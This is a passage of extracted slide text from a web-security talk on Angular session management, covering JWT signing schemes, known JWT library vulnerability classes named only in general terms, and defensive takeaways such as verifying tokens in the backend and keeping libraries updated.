![Page 44: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/44.jpg)
@PhilippeDeRyck
THERE IS A LOT MORE TO A JWTTOKEN
§ JWTisanopenstandardtoexchangeinformation− PartofaJSON-basedIdentityProtocolSuite− UsedbyOpenIDConnect,ontopofOAuth2.0
§ SignaturesareessentialtoensuretheintegrityofJWTtokens− ThespecactuallyallowsJWTtokenswithoutwithoutsignatures,butthisisactivelydiscouraged−Mostcommonaresignatureswithonesharedkey,forusewithinoneapplication− Alternatively,theJWTissignedwithaprivatekey,andcanbeverifiedwithapublickey
§ Otherspecificationscoveradditionalcryptographicsupport− JSONWebSignatures(JWS)− JSONWebEncryption(JWE)− JSONWebKey(JWK)
44
![Page 45: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/45.jpg)
@PhilippeDeRyck
JWTSIGNATURES WITHIN ONE APPLICATION
45
JWT
JWT
sharedkey
![Page 46: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/46.jpg)
@PhilippeDeRyck
JWTSIGNATURES ACROSS APPLICATIONS
46
JWT
JWT
privatekey
publickey
![Page 47: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/47.jpg)
@PhilippeDeRyck
JWTS ARE YOUNG,AND SUFFER FROM GROWING PAINS
§ Integrityandconfidentialityrequirestheuseofcrypto−Cryptoishard,andJWTlibrarieshavehadsomeimplementationissues
§ Amajorpartoftheproblemisthattheattackercancontroltheheader− Theheadercontainsinformationaboutthealgorithmsthatareused− Soitneedstobetrustedbeforetheintegrityofthetokencanbeverified
§ Practicalattacksthathavebeendiscoveredinthepast−Generatingarbitrarytokensusingthe“none”algorithm−GeneratingarbitrarytokensbyconfusingtheserverbetweenHMACandpublickeys− Extractingtheencryptionkeybymanipulatingellipticcurveparameters
47
https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/http://blogs.adobe.com/security/2017/03/critical-vulnerability-uncovered-in-json-encryption.html
![Page 48: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/48.jpg)
@PhilippeDeRyck
TAKEAWAY #4
JWTS ARE WELL SUPPORTED,BUT REQUIRE CONSTANT SUPERVISION
§ JWTshavebecomeapopularwaytorepresentclaims−HeavilyusedinOpenIDConnecttoexchangeidentityinformation−OftenrecommendedasthepreferredwaytodosessionmanagementinAngular
§ AvoidthesecommonmistakeswhenusingJWTtokensinyourapplication−Verifytheintegrityofthetokeninthebackendbeforeusinganyofitsdata−Usetherightsigningmechanism(HMACvspublicsignatures)−Avoidclient-sidedependenciesonthecontentsofthetoken
§Unfortunately,JWTsseemtoberepeatinghistory−Alotofmistakesaremade,verysimilartotheearlydaysofXML−Makesureyouusecommonlibraries,andaggressivelykeepthemuptodate
![Page 49: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/49.jpg)
@PhilippeDeRyck 49
TAKEAWAY #4
JWTS ARE WELL SUPPORTED,BUT REQUIRE CONSTANT SUPERVISION
TAKEAWAY #3
THE TRANSPORT MECHANISM FOR SESSION DATA HAS A BIG IMPACT
TAKEAWAY #1
ANGULAR ALREADY PROTECTS YOU AGAINST XSS,JUST GET OUT OF THE WAY
TAKEAWAY #2
NEVER PASS UNTRUSTED DATA TO THE COMPILER
![Page 50: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/50.jpg)
@PhilippeDeRyck
NOW IT’S UP TO YOU …
Secure ShareFollow
https://www.websec.be [email protected] /in/philippederyck